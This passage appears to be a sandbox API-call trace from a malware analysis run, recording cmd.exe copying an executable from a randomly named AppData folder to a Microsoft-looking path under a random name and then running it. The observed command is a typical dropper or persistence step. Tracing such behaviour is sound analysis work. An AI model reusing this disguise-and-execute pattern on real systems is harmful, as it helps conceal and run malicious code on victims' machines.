0x7 [0096.222] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0096.222] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.222] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0096.222] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.222] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0096.222] GetEnvironmentStringsW () returned 0x1a0400* [0096.223] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.223] GetEnvironmentStringsW () returned 0x1a0400* [0096.223] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7bc | out: phkResult=0x18e7bc*=0x40) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0xb0, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x0, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegCloseKey (hKey=0x40) returned 0x0 [0096.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7bc | out: phkResult=0x18e7bc*=0x40) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x0, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegCloseKey (hKey=0x40) returned 0x0 [0096.223] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634a [0096.223] srand (_Seed=0x5b88634a) [0096.223] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0096.223] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0096.224] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.224] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a1b60, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0096.224] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.224] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.224] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0096.224] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0096.224] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0096.224] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0096.224] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0096.224] GetEnvironmentStringsW () returned 0x1a2550* [0096.225] FreeEnvironmentStringsW (penv=0x1a2550) returned 1 [0096.225] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.225] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.225] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0096.225] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0096.225] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0096.225] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0096.225] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0096.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f588 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.225] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f588, lpFilePart=0x18f584 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f584*="Desktop") returned 0x18 [0096.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.226] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0096.226] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0096.226] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0096.226] GetEnvironmentStringsW () returned 0x1a0400* [0096.226] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.226] GetConsoleOutputCP () returned 0x1b5 [0096.226] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0096.226] GetUserDefaultLCID () returned 0x409 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6c8, cchData=128 | out: lpLCData="0") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6c8, cchData=128 | out: lpLCData="0") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6c8, cchData=128 | out: lpLCData="1") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0096.227] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0096.228] GetConsoleTitleW (in: lpConsoleTitle=0x190a60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.228] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0096.229] _wcsicmp (_String1="type", _String2=")") returned 75 [0096.229] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0096.229] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0096.229] _wcsicmp (_String1="IF", _String2="type") returned -11 [0096.229] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0096.229] _wcsicmp (_String1="REM", _String2="type") returned -2 [0096.229] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0096.233] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 68 [0096.233] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 68 [0096.233] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 71 [0096.233] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 71 [0096.233] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 80 [0096.233] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 80 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] GetFileType (hFile=0x7) returned 0x2 [0096.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0096.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f55c | out: lpMode=0x18f55c) returned 1 [0096.236] _dup (_FileHandle=1) returned 3 [0096.236] _close (_FileHandle=1) returned 0 [0096.236] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", _String2="con") returned -53 [0096.236] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f52c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0096.237] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0096.237] GetConsoleTitleW (in: lpConsoleTitle=0x18f35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.237] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0096.237] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0096.237] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0096.237] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0096.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18eec0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eec0) returned 0x1a20b8 [0096.238] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0096.238] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0096.239] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0096.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18ddcc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0096.239] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] GetFileType (hFile=0x54) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18de24 | out: lpFileSizeHigh=0x18de24*=0x0) returned 0x7d600 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] GetFileType (hFile=0x4c) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] GetFileType (hFile=0x4c) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.242] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.243] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, 